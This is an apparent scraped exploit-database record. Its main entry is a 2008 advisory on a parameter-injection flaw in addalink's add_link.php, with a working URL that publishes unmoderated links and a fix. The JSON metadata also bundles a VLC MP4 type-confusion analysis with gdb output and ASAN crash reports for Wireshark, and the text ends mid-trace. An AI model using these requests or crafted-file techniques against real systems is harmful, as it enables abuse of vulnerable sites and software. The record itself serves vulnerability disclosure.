ID 1337DAY-ID-3685 Type zdt Reporter Pepelux Modified 2008-09-17T00:00:00
Description
Exploit for unknown platform in category web applications
=======================================================
addalink <= 4 Write Approved Links Remote Vulnerability
=======================================================
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
addalink <= 4 - beta / Write approved links without a previous moderation by the admin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$ Program: addalink
$ Version: <= 4 - beta
$ File affected: add_link.php
$ Download: http://sourceforge.net/projects/addalink/
Linklist is a miniwebsite that you can use in your webpage. Basically it
manages a database of links using PHP+MySQL. Users can send links (url,
description, etc) by a form and one admin has to approve or delete the
links before the publication in the website.
One not very important problem is that add_link.php doesn't test the
method used (GET or POST). But the real problem is the method to insert
some values.
Reading the code you can see the SQL sentence:
INSERT INTO $linktable VALUES('0','$url','$linkname','$approved=0','$email',
'$counter=0','$description','$ip','$date','$category_id','0')";
It asign values to approved and counter directly in the SQL sentence. For that,
you can enter links approved without moderation writing this:
http://domain/add_link.php?url=http://www.domain.com&linkname=name_of_the_link
&approved=1&[email protected]&description=blablablablablablabla&category_id=1
Also you can alter the counter of visits if you add &counter=XXXX to the GET
-= Solution =-
$approved = 0;
$counter = 0;
INSERT INTO $linktable VALUES('0','$url','$linkname','$approved','$email',
'$counter','$description','$ip','$date','$category_id','0')";
# 0day.today [2018-01-03] #
{"published": "2008-09-17T00:00:00", "id": "1337DAY-ID-3685", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:33:09", "bulletin": {"published": "2008-09-17T00:00:00", "id": "1337DAY-ID-3685", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.4, "modified": "2016-04-20T01:33:09"}}, "hash": "28257c68bd8588528bce9cd44b2b25c0ecfc7de3472b2ce64173fdb342f047ad", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:33:09", "edition": 1, "title": "addalink <= 4 Write Approved Links Remote Vulnerability", "href": "http://0day.today/exploit/description/3685", "modified": "2008-09-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/3685", "references": [], "reporter": "Pepelux", "sourceData": "=======================================================\r\naddalink <= 4 Write Approved Links Remote Vulnerability\r\n=======================================================\r\n\r\n\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\naddalink <= 4 - beta / Write approved links without a previous moderation by the admin\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\n$ Program: addalink\r\n$ Version: <= 4 - beta\r\n$ File affected: add_link.php\r\n$ Download: http://sourceforge.net/projects/addalink/\r\n\r\n\r\nLinklist is a miniwebsite that you can use in your webpage. Basically it \r\nmanages a database of links using PHP+MySQL. Users can send links (url, \r\ndescription, etc) by a form and one admin has to approve or delete the \r\nlinks before the publication in the website.\r\n\r\nOne not very important problem is that add_link.php doesn't test the \r\nmethod used (GET or POST). But the real problem is the method to insert \r\nsome values. \r\n\r\nReading the code you can see the SQL sentence:\r\n\r\nINSERT INTO $linktable VALUES('0','$url','$linkname','$approved=0','$email',\r\n '$counter=0','$description','$ip','$date','$category_id','0')\";\r\n\r\nIt asign values to approved and counter directly in the SQL sentence. For that,\r\nyou can enter links approved without moderation writing this:\r\n\r\nhttp://domain/add_link.php?url=http://www.domain.com&linkname=name_of_the_link\r\n&approved=1&email=my@email.com&description=blablablablablablabla&category_id=1\r\n\r\nAlso you can alter the counter of visits if you add &counter=XXXX to the GET\r\n\r\n\r\n-= Solution =-\r\n\r\n\r\n$approved = 0;\r\n$counter = 0;\r\n\r\nINSERT INTO $linktable VALUES('0','$url','$linkname','$approved','$email',\r\n '$counter','$description','$ip','$date','$category_id','0')\";\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "daaa8d7a979dad00b1ab30fd1348e76e", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "76f99038060f13ddc5ba01678e7aa8ed", "key": "sourceHref"}, {"hash": "55107d6b98930106723901687b396d09", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "050ae1c2863605abd616a70f0337ca8c", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "050ae1c2863605abd616a70f0337ca8c", "key": "published"}, {"hash": "c58a79cb277826091d627963ec2620ec", "key": "reporter"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "ee4cf3c4bf18f6aed171f242b2b0a8ab", "key": "href"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "373534fe245d457dde5fb9437fc6d173f717f14823bbf12303578d7791d47e61", "enchantments": {"vulnersScore": 5.0}, "type": "zdt", "lastseen": "2018-01-03T13:16:48", "edition": 2, "title": "addalink <= 4 Write Approved Links Remote Vulnerability", "href": "https://0day.today/exploit/description/3685", "modified": "2008-09-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "https://0day.today/exploit/3685", "references": [], "reporter": "Pepelux", "sourceData": "=======================================================\r\naddalink <= 4 Write Approved Links Remote Vulnerability\r\n=======================================================\r\n\r\n\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\naddalink <= 4 - beta / Write approved links without a previous moderation by the admin\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\n$ Program: addalink\r\n$ Version: <= 4 - beta\r\n$ File affected: add_link.php\r\n$ Download: http://sourceforge.net/projects/addalink/\r\n\r\n\r\nLinklist is a miniwebsite that you can use in your webpage. Basically it \r\nmanages a database of links using PHP+MySQL. Users can send links (url, \r\ndescription, etc) by a form and one admin has to approve or delete the \r\nlinks before the publication in the website.\r\n\r\nOne not very important problem is that add_link.php doesn't test the \r\nmethod used (GET or POST). But the real problem is the method to insert \r\nsome values. \r\n\r\nReading the code you can see the SQL sentence:\r\n\r\nINSERT INTO $linktable VALUES('0','$url','$linkname','$approved=0','$email',\r\n '$counter=0','$description','$ip','$date','$category_id','0')\";\r\n\r\nIt asign values to approved and counter directly in the SQL sentence. For that,\r\nyou can enter links approved without moderation writing this:\r\n\r\nhttp://domain/add_link.php?url=http://www.domain.com&linkname=name_of_the_link\r\n&approved=1&[email\u00a0protected]&description=blablablablablablabla&category_id=1\r\n\r\nAlso you can alter the counter of visits if you add &counter=XXXX to the GET\r\n\r\n\r\n-= Solution =-\r\n\r\n\r\n$approved = 0;\r\n$counter = 0;\r\n\r\nINSERT INTO $linktable VALUES('0','$url','$linkname','$approved','$email',\r\n '$counter','$description','$ip','$date','$category_id','0')\";\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-03] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "d9fbadd05f713cbf82f81df71f3652dd", "key": "href"}, {"hash": "050ae1c2863605abd616a70f0337ca8c", "key": "modified"}, {"hash": "050ae1c2863605abd616a70f0337ca8c", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c58a79cb277826091d627963ec2620ec", "key": "reporter"}, {"hash": "43b8f3e303a299b753c3509402965fdb", "key": "sourceData"}, {"hash": "051d1f2eb4546d021d92be0e185e0dcb", "key": "sourceHref"}, {"hash": "55107d6b98930106723901687b396d09", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"result": {"zdt": [{"lastseen": "2018-04-08T23:43:06", "references": [], "description": "Exploit for linux platform in category dos / poc", "edition": 1, "reporter": "Hans Jerry Illikainen", "published": "2017-12-17T00:00:00", "title": "VLC 2.2.8 MP4 Demux Type Conversion Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-08T23:43:06", "vector": "AV:N/AC:L/Au:M/C:P/I:N/A:P/", "value": 4.7}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-17670"], "modified": "2017-12-17T00:00:00", "id": "1337DAY-ID-29240", "href": "https://0day.today/exploit/description/29240", "sourceData": "About\r\n=====\r\n\r\nA type conversion vulnerability exist in the MP4 demux module in VLC\r\n<=2.2.8. This issue has been assigned CVE-2017-17670 and it could be\r\nused to cause an arbitrary free.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nMP4 is a container format for video, audio, subtitles and images. The\r\nvarious parts of an .mp4 are organized as hierarchical boxes/atoms in\r\nbig-endian byte ordering [1].\r\n\r\nVLC processes these boxes by using a lookup table:\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.c\r\n,----\r\n| 3297 static const struct\r\n| 3298 {\r\n| 3299 uint32_t i_type;\r\n| 3300 int (*MP4_ReadBox_function )( stream_t *p_stream, MP4_Box_t *p_box );\r\n| 3301 void (*MP4_FreeBox_function )( MP4_Box_t *p_box );\r\n| 3302 uint32_t i_parent; /* set parent to restrict, duplicating if needed; 0 for any */\r\n| 3303 } MP4_Box_Function [] =\r\n| 3304 {\r\n| 3305 /* Containers */\r\n| 3306 { ATOM_moov, MP4_ReadBoxContainer, MP4_FreeBox_Common, 0 },\r\n| 3307 { ATOM_trak, MP4_ReadBoxContainer, MP4_FreeBox_Common, ATOM_moov },\r\n| ....\r\n| 3565 /* Last entry */\r\n| 3566 { 0, MP4_ReadBox_default, NULL, 0 }\r\n| 3567 };\r\n`----\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.c\r\n,----\r\n| 3574 static MP4_Box_t *MP4_ReadBox( stream_t *p_stream, MP4_Box_t *p_father )\r\n| 3575 {\r\n| 3576 MP4_Box_t *p_box = calloc( 1, sizeof( MP4_Box_t ) ); /* Needed to ensure simple on error handler */\r\n| 3577 unsigned int i_index;\r\n| ....\r\n| 3582 if( !MP4_ReadBoxCommon( p_stream, p_box ) )\r\n| 3583 {\r\n| ....\r\n| 3587 }\r\n| ....\r\n| 3605 /* Now search function to call */\r\n| 3606 for( i_index = 0; ; i_index++ )\r\n| 3607 {\r\n| ....\r\n| 3613 if( ( MP4_Box_Function[i_index].i_type == p_box->i_type )||\r\n| 3614 ( MP4_Box_Function[i_index].i_type == 0 ) )\r\n| 3615 {\r\n| 3616 break;\r\n| 3617 }\r\n| 3618 }\r\n| 3619\r\n| 3620 if( !(MP4_Box_Function[i_index].MP4_ReadBox_function)( p_stream, p_box ) )\r\n| 3621 {\r\n| 3622 MP4_BoxFree( p_stream, p_box );\r\n| 3623 return NULL;\r\n| 3624 }\r\n| 3625\r\n| 3626 return p_box;\r\n| 3627 }\r\n`----\r\n\r\n\r\nMP4_ReadBox() allocates a MP4_Box_t structure and invokes\r\nMP4_ReadBoxCommon() to read the properties common to all mp4 boxes;\r\n`i_size' and `i_type' (and optionally an extended size). Afterwards,\r\nMP4_Box_Function is used to dispatch further parsing to a suitable\r\nfunction based on its `i_type'.\r\n\r\nWhen VLC is done with the boxes, they are freed with MP4_BoxFree():\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.c\r\n,----\r\n| 3633 void MP4_BoxFree( stream_t *s, MP4_Box_t *p_box )\r\n| 3634 {\r\n| 3635 unsigned int i_index;\r\n| ....\r\n| 3650 /* Now search function to call */\r\n| 3651 if( p_box->data.p_payload )\r\n| 3652 {\r\n| 3653 for( i_index = 0; ; i_index++ )\r\n| 3654 {\r\n| ....\r\n| 3660 if( ( MP4_Box_Function[i_index].i_type == p_box->i_type )||\r\n| 3661 ( MP4_Box_Function[i_index].i_type == 0 ) )\r\n| 3662 {\r\n| 3663 break;\r\n| 3664 }\r\n| 3665 }\r\n| 3666 if( MP4_Box_Function[i_index].MP4_FreeBox_function == NULL )\r\n| 3667 {\r\n| ....\r\n| 3677 }\r\n| 3678 else\r\n| 3679 {\r\n| 3680 MP4_Box_Function[i_index].MP4_FreeBox_function( p_box );\r\n| 3681 }\r\n| ....\r\n| 3685 }\r\n`----\r\n\r\nAgain, `i_type' is used to find a suitable free-function.\r\n\r\nThe reason this may be problematic is that `i_type' could be changed\r\nwhen VLC handles `sinf' and `frma' boxes in TrackCreateES() -- meaning\r\nthat a box may be read as one type, and freed as another.\r\n\r\n`sinf' is the \"Protection Scheme Information Box\" and it's used for\r\nprotected/encrypted media. `frma' is the \"Original Format Box\" and it's\r\nused to declare the format of the unprotected media.\r\n\r\nIf a sinf/frma is found underneath a sample box, the `i_type' of that\r\nsample is replaced with the original format declared in the `frma':\r\n\r\nvlc-2.2.8/modules/demux/mp4/mp4.c\r\n,----\r\n| 2180 static int TrackCreateES( demux_t *p_demux, mp4_track_t *p_track,\r\n| 2181 unsigned int i_chunk, es_out_id_t **pp_es )\r\n| 2182 {\r\n| ....\r\n| 2208 p_sample = MP4_BoxGet( p_track->p_stsd, \"[%d]\",\r\n| 2209 i_sample_description_index - 1 );\r\n| ....\r\n| 2219 p_track->p_sample = p_sample;\r\n| 2220\r\n| 2221 if( ( p_frma = MP4_BoxGet( p_track->p_sample, \"sinf/frma\" ) ) && p_frma->data.p_frma )\r\n| 2222 {\r\n| 2223 msg_Warn( p_demux, \"Original Format Box: %4.4s\", (char *)&p_frma->data.p_frma->i_type );\r\n| 2224\r\n| 2225 p_sample->i_type = p_frma->data.p_frma->i_type;\r\n| 2226 }\r\n| ....\r\n`----\r\n\r\nNo sanity check is done to make sure that the MP4_FreeBox_function\r\nassociated with the new `i_type' is compatible with the old\r\nMP4_ReadBox_function.\r\n\r\n\r\nExample\r\n=======\r\n\r\nOne way to abuse the type change is to have a `soun' changed to a\r\n`vide'. This results in a 72-byte allocation (x86-64) for the\r\n`p_sample_soun' member of the p_box->data union when the box is read:\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.c\r\n,----\r\n| 1614 static int MP4_ReadBox_sample_soun( stream_t *p_stream, MP4_Box_t *p_box )\r\n| 1615 {\r\n| 1616 p_box->i_handler = ATOM_soun;\r\n| 1617 MP4_READBOX_ENTER( MP4_Box_data_sample_soun_t );\r\n| ....\r\n`----\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.h\r\n,----\r\n| 1351 #define MP4_READBOX_ENTER( MP4_Box_data_TYPE_t ) \\\r\n| ....\r\n| 1369 if( !( p_box->data.p_payload = calloc( 1, sizeof( MP4_Box_data_TYPE_t ) ) ) ) \\\r\n| 1370 { \\\r\n| ....\r\n| 1373 }\r\n`----\r\n\r\nwhere `p_box' is MP4_Box_t:\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.h\r\n,----\r\n| 1284 typedef struct MP4_Box_s\r\n| 1285 {\r\n| ....\r\n| 1296 MP4_Box_data_t data; /* union of pointers on extended data depending\r\n| 1297 on i_type (or i_usertype) */\r\n| ....\r\n| 1306 } MP4_Box_t;\r\n`----\r\n\r\nand MP4_Box_data_t:\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.h\r\n,----\r\n| 1200 typedef union MP4_Box_data_s\r\n| 1201 {\r\n| ....\r\n| 1220 MP4_Box_data_sample_vide_t *p_sample_vide;\r\n| 1221 MP4_Box_data_sample_soun_t *p_sample_soun;\r\n| ....\r\n| 1278 void *p_payload; /* for unknow type */\r\n| 1279 } MP4_Box_data_t;\r\n`----\r\n\r\n,----\r\n| (gdb) p sizeof(MP4_Box_data_sample_soun_t)\r\n| $1 = 72\r\n`----\r\n\r\nAfter the box has had its type changed to `vide' and it's later freed,\r\nthe `p_sample_vide' member of the p_box->data union is used:\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.c\r\n,----\r\n| 1861 void MP4_FreeBox_sample_vide( MP4_Box_t *p_box )\r\n| 1862 {\r\n| 1863 FREENULL( p_box->data.p_sample_vide->p_qt_image_description );\r\n| 1864 }\r\n`----\r\n\r\n,----\r\n| (gdb) p sizeof(MP4_Box_data_sample_vide_t)\r\n| $2 = 96\r\n| (gdb)\r\n`----\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.h\r\n,----\r\n| 529 typedef struct MP4_Box_data_sample_vide_s\r\n| 530 {\r\n| ...\r\n| 557 uint8_t *p_qt_image_description;\r\n| 558\r\n| 559 } MP4_Box_data_sample_vide_t;\r\n`----\r\n\r\n`p_sample_vide' is 24 bytes larger than `p_sample_soun', and\r\n`p_qt_image_description' is at the end of the vide struct; i.e. the\r\npointer to be free()d is read out-of-bounds from potentially\r\nuser-controlled memory.\r\n\r\n`mkmp4.py' at [2]\r\n\r\n,----\r\n| $ uname -imrs\r\n| FreeBSD 11.1-RELEASE-p4 amd64 GENERIC\r\n| $ ./mkmp4.py file.mp4\r\n| $ vlc --version\r\n| VLC media player 2.2.8 Weatherwax (revision 2.2.7-14-g3cc1d8cba9)\r\n| $ gdb -q --args vlc file.mp4\r\n| (gdb) set breakpoint pending on\r\n| (gdb) b libmp4.c:1618\r\n| No source file named libmp4.c.\r\n| Breakpoint 1 (libmp4.c:1618) pending.\r\n| (gdb) b libmp4.c:1863\r\n| No source file named libmp4.c.\r\n| Breakpoint 2 (libmp4.c:1863) pending.\r\n| (gdb) r\r\n| [...]\r\n| Breakpoint 3, MP4_ReadBox_sample_soun (p_stream=0x802ab2710, p_box=0x802a85000) at demux/mp4/libmp4.c:1618\r\n| 1618 p_box->data.p_sample_soun->p_qt_description = NULL;\r\n| (gdb) p p_box->data.p_sample_soun\r\n| $1 = (MP4_Box_data_sample_soun_t *) 0x802a79810\r\n| (gdb) c\r\n| Continuing.\r\n|\r\n| Breakpoint 4, MP4_FreeBox_sample_vide (p_box=0x802a85000) at demux/mp4/libmp4.c:1863\r\n| 1863 FREENULL( p_box->data.p_sample_vide->p_qt_image_description );\r\n| (gdb) p p_box->data.p_sample_vide\r\n| $2 = (MP4_Box_data_sample_vide_t *) 0x802a79810\r\n| (gdb) p p_box->data.p_sample_vide->p_qt_image_description\r\n| $3 = (uint8_t *) 0x1122334455667788 <Error reading address 0x1122334455667788: Bad address>\r\n| (gdb) b free\r\n| Breakpoint 5 at 0x8019d3ce4\r\n| (gdb) c\r\n| Continuing.\r\n|\r\n| Breakpoint 5, 0x00000008019d3ce4 in free () from /lib/libc.so.7\r\n| (gdb) p/x $rdi\r\n| $4 = 0x1122334455667788\r\n| (gdb) c\r\n| Continuing.\r\n|\r\n| Program received signal SIGBUS, Bus error.\r\n| 0x00000008019d36f3 in realloc () from /lib/libc.so.7\r\n| (gdb) x/i $rip\r\n| 0x8019d36f3 <realloc+3939>: mov rbx,QWORD PTR [rax+rcx*8+0x68]\r\n| (gdb) i r\r\n| rax 0x1122334455600000 1234605616436084736\r\n| rbx 0x1122334455667788 1234605616436508552\r\n| rcx 0x5a 90\r\n| [...]\r\n| (gdb) bt 4\r\n| #0 0x00000008019d36f3 in realloc () from /lib/libc.so.7\r\n| #1 0x00000008019d3d51 in free () from /lib/libc.so.7\r\n| #2 0x0000000806d7fafd in MP4_FreeBox_sample_vide (p_box=0x802a85000) at demux/mp4/libmp4.c:1863\r\n| #3 0x0000000806d7fcfd in MP4_BoxFree (s=0x802ab2710, p_box=0x802a85000) at demux/mp4/libmp4.c:3680\r\n`----\r\n\r\n\r\nSolution\r\n========\r\n\r\nThis issue does not affect the HEAD of the VLC master branch.\r\n\r\n\r\n\r\nFootnotes\r\n_________\r\n\r\n[1] [http://xhelmboyx.tripod.com/formats/mp4-layout.txt]\r\n\r\n[2] [https://gist.github.com/dyntopia/194d912287656f66dd502158b0cd2e68]\r\n\r\n\r\n-- \r\nhji\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29240"}, {"lastseen": "2018-04-06T01:48:14", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-03-07T00:00:00", "title": "Wireshark - wtap_optionblock_free Use-After-Free", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-06T01:48:14", "vector": "AV:N/AC:L/Au:M/C:C/I:C/A:C/", "value": 8.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-03-07T00:00:00", "id": "1337DAY-ID-25861", "href": "https://0day.today/exploit/description/25861", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=739\r\n \r\nThe following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==6853==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400009d960 at pc 0x7ff7905dc0fe bp 0x7fff079e9fc0 sp 0x7fff079e9fb8\r\nREAD of size 4 at 0x60400009d960 thread T0\r\n #0 0x7ff7905dc0fd in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:161:20\r\n #1 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4\r\n #2 0x52a08b in load_cap_file wireshark/tshark.c:3685:3\r\n #3 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\n0x60400009d960 is located 16 bytes inside of 40-byte region [0x60400009d950,0x60400009d978)\r\nfreed by thread T0 here:\r\n #0 0x4c1d80 in __interceptor_free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30\r\n #1 0x7ff7905dc32f in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:173:9\r\n #2 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4\r\n #3 0x52a08b in load_cap_file wireshark/tshark.c:3685:3\r\n #4 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\npreviously allocated by thread T0 here:\r\n #0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7ff77bc84610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0x7ff79055907d in pcapng_read wireshark/wiretap/pcapng.c:2564:35\r\n #3 0x7ff7905d825b in wtap_read wireshark/wiretap/wtap.c:1253:7\r\n #4 0x528036 in load_cap_file wireshark/tshark.c:3499:12\r\n #5 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\nSUMMARY: AddressSanitizer: heap-use-after-free wireshark/wiretap/wtap_opttypes.c:161:20 in wtap_optionblock_free\r\nShadow bytes around the buggy address:\r\n 0x0c088000bad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c088000bae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c088000baf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c088000bb00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c088000bb10: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 fa\r\n=>0x0c088000bb20: fa fa 00 00 00 00 00 fa fa fa fd fd[fd]fd fd fa\r\n 0x0c088000bb30: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa\r\n 0x0c088000bb40: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa\r\n 0x0c088000bb50: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa\r\n 0x0c088000bb60: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 fa\r\n 0x0c088000bb70: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==6853==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12173. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39529.zip\n\n# 0day.today [2018-04-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25861"}, {"lastseen": "2018-01-04T15:02:23", "references": [], "edition": 2, "description": "Exploit for multiple platform in category dos / poc", "reporter": "Google Security Research", "published": "2015-12-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "Wireshark - dissect_zcl_pwr_prof_pwrprofstatersp Static Out-of-Bounds Read", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-8732"], "modified": "2015-12-16T00:00:00", "id": "1337DAY-ID-25715", "href": "https://0day.today/exploit/description/25715", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=661\r\n \r\nThe following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==7849==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f8e33764094 at pc 0x7f8e29788726 bp 0x7ffe27806640 sp 0x7ffe27806638\r\nREAD of size 4 at 0x7f8e33764094 thread T0\r\n #0 0x7f8e29788725 in dissect_zcl_pwr_prof_pwrprofstatersp wireshark/epan/dissectors/packet-zbee-zcl-general.c:3847:21\r\n #1 0x7f8e2977f2be in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:3494:21\r\n #2 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #3 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #4 0x7f8e271ad2be in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #5 0x7f8e2719eccf in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #6 0x7f8e297738ac in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:887:13\r\n #7 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #8 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #9 0x7f8e271ad2be in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #10 0x7f8e2719eccf in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #11 0x7f8e2974de40 in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1029:21\r\n #12 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #13 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #14 0x7f8e271ad2be in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #15 0x7f8e2719eccf in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #16 0x7f8e29757897 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:665:9\r\n #17 0x7f8e297518aa in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:701:9\r\n #18 0x7f8e29752ef7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:337:5\r\n #19 0x7f8e271ab417 in dissector_try_heuristic wireshark/epan/packet.c:2329:7\r\n #20 0x7f8e2826863b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1139:17\r\n #21 0x7f8e2825e35e in dissect_ieee802154 wireshark/epan/dissectors/packet-ieee802154.c:561:5\r\n #22 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #23 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #24 0x7f8e271a2dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9\r\n #25 0x7f8e27eb25f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11\r\n #26 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #27 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #28 0x7f8e271ad2be in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #29 0x7f8e2719eccf in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #30 0x7f8e2719e33b in dissect_record wireshark/epan/packet.c:501:3\r\n #31 0x7f8e2714c3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2\r\n #32 0x5264eb in process_packet 